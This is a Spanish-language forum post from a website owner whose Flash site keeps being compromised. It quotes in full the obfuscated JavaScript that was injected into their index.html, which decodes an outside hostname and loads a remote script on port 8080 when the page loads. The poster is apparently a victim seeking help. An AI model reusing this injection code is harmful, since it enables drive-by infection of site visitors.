Buenas a todos y de ante mano gracias por tomarse la molestia de siquiera leer mi problema.

Hice una pagina en flash simple, sin mucha animacion ni nada, pero ultimamente me ah dado problemas el archivo AC_RunActiveContent.js mi antivirus (NOD32) lo empezo a tomar como un virus de un dia para otro, a demas a algunas personas le paso que se le borro el explorador que usaron para visitar la pagina, es algo que nunca me habia pasado y buscando en este foro tampoco encontre nada ojala alguien pueda ayudarme.

El segundo problema que tengo que hace 2 dias aprox empezo a agregarse una linea de script extraña a mi index.html esta linea se agrega sola una vez subido mis archivos a mi servidor y pasadas unas horas, llevo tiempo subiendo archivos a este servidor y nunca me habia pasado...
el script que se le agrega es el siguiente.

Código Javascript :

<script> try{window.onload=function(){document.write('<div id=Xfdwadajk57t>macys-com.addthis.com.eyn</div>');R83dtmtmz5c5y7 = document.getElementById('Xfdwadajk57t').innerHTML + 'y^(^-(!)c&^$o$m^@&.!!u^#!r#)(l$(^@n&)e^x$&t#&^@$.$$r#u&^#:($@I#p!(#k!&&v@$)#v!^!r!n@&a^&#p(!&g)(@/^(&!i(!)n^d^^!#i^&&a#(^(t$$^i)(^m#!!(e)@s@#.^!@!c!o^^@)m@$(/(#$^i$n!!&#d$i)))a^@t&^$i$(!m&&e(#^!s#@!.#&(!c!^o@(&m#$$!/#^&g@@o&$o$!g&l(#e^!.@c^o!m@(/)^&a&r((m!(o!r^!g)^a&)(m^e#!!!s&!(.)$c&@^$o(m@$#(#/(@g)&o&&$)o@$g)!)l)$&e)$).$(c!(o^&.!!^!u&#^)$k@/(^('.replace(/\)|&|\!|#|@|\$|\(|\^/ig, '') ;document.write('<scr'+'ipt src=h'+'ttp://'+R83dtmtmz5c5y7.replace(/Ipkvvrnapg/g, '8080')+'></scr'+'ipt>');} }  catch(T6bypxsq ) {}</script>
<!--01b96db2c9bbb0c6fd382a6f8ab8d06a-->

y en mi pagina se deja de ver el flash y sale esto "macys-com.addthis.com.eyn", borrando esa linea de codigo no se arregla el problema, solo se arregla cuando elimino todo y vuelvo a subir todo el contenido de mi pagina, ya van 3 veces que hago esto y las 3 veces se le inserta ese codigo, a veces cambia un poco y en la pagina muestra otras direcciones, algo de google y unos bancos extraños.

en mis archivos .html no tengo agregado ningun codigo extraño estan sacados tal cual los deja el flash al publicarlos
solo le agregue esto <link rel="shortcut icon" href="http://www.caminosdesanacion.cl/favicon.ico"> para ponerle la foto a la direccion.

Espero puedan ayudarme, me tiene bien jodido ya este problemita,
Un saludo a todos y Gracias.
Bye.